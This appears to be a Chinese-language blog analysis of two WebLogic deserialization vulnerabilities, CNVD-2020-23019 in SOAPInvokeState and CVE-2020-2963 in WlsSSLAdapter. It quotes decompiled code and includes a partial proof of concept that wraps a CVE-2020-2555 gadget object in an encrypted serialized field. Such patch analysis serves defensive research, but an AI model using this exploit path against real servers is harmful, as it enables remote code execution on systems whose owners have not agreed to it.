简介

这两个洞应该都是5月更新的补丁，分析时候无意中发现的。看了一下漏洞挺简单，就是利用有点苛刻

 

SOAPInvokeState CNVD-2020-23019

diff 补丁，截图如下

可以很明显的看出，将ObjectInputStream更改为FilterInputStream。在weblogic中，FilterInputStream负责检查反序列化的类种是否存在可以利用的Gadget，而ObjectInputStream不会。并且在类的readObject 方法中，通过T3协议反序列化默认的参数为FilterInputStream，以此来防御反序列化漏洞。

 

除非类的readObject中乱调用ObjectInputStream，否则是不会产生反序列化漏洞的。

 

在SOAPInvokeState的readExternal中，我们只要能走入以下的流程即可

if((flags & 1) != 0) {

try {

len = in.readInt();

byte[] bytes = new byte[len];

in.readFully(bytes);

bytes = EncryptionUtil.decrypt(bytes);

ByteArrayInputStream bais = new ByteArrayInputStream(bytes);

ObjectInputStream in2 = new ObjectInputStream(bais);

this.subject = (AuthenticatedSubject)in2.readObject();

} catch (Exception var13) {

(new NonCatalogLogger("WebServices")).warning("Couldn't completely read SOAPInvokeState object", var13);

}

 

看一下writeExternal方法，被实例化的类中存在subject，就可以让readExternal执行上面的反序列化流程

 

if(this.subject != null) {

ByteArrayOutputStream var12 = new ByteArrayOutputStream();

ObjectOutputStream var13 = new ObjectOutputStream(var12);

var13.writeObject(this.subject);

var13.flush();

byte[] var5 = var12.toByteArray();

var5 = EncryptionUtil.encrypt(var5);

var1.writeInt(var5.length);

var1.write(var5);

}

当然，还下面问题

 

加密

在EncryptionUtil.encrypt加密时，会根据Kernel.isServer()为true，才会进行加密，否则返回原数据。 因此加密之前需要调用KernelStatus.setIsServer(true)设置状态为true，或者强行加密。

public static byte[] encrypt(byte[] var0) {

returngetEncryptionService().encryptBytes(var0);

}

在weblogic.security.internal.SerializedSystemIni#getExistingEncryptionService中，会读取SerializedSystemIni.dat作为密钥，也就是说，需要认证或者配合文件读取才能利用该漏洞去攻击weblogic

 

public static EncryptionService getExistingEncryptionService() {

String var0 = DomainDir.getRootDir();

String var1 = var0 + File.separator + "security"+ File.separator + "SerializedSystemIni.dat";

File var2 = new File(var1);

if(!var2.exists()) {

String var3 = var0 + File.separator + "SerializedSystemIni.dat";

File var4 = new File(var3);

if(!var4.exists()) {

returnnull;

}

 

var1 = var3;

}

 

SerializedSystemIni var5 = new SerializedSystemIni(var1);

returngetEncryptionService(var5.getTheSalt(), var5.getTheEncryptedSecretKey(), var5.getTheAESEncryptedSecretKey());

POC

魔改一下 writeExternal为下面的代码，再反序列化即可

 

BadAttributeValueExpException exp = null;

try {

exp = cve_2020_2555.getBadAttributeValueExpException();

} catch (Exception e) {

e.printStackTrace();

}

out2.writeObject(exp);

out2.flush();

byte[] bytes = baos.toByteArray();

bytes = EncryptionUtil.encrypt(bytes);

out.writeInt(bytes.length);

out.write(bytes);

}

 

}

 

WlsSSLAdapter CVE-2020-2963

原理一样，详见下面的代码

private Object readEncryptedField(ObjectInputStream in) throws IOException, ClassNotFoundException {

int length = in.readInt();

if(length <= 0) {

returnin.readObject();

} else{

byte[] bytes = new byte[length];

in.readFully(bytes);

bytes = EncryptionUtil.decrypt(bytes);

ByteArrayInputStream bais = new ByteArrayInputStream(bytes);

ObjectInputStream in2 = new ObjectInputStream(bais);

returnin2.readObject();

}

}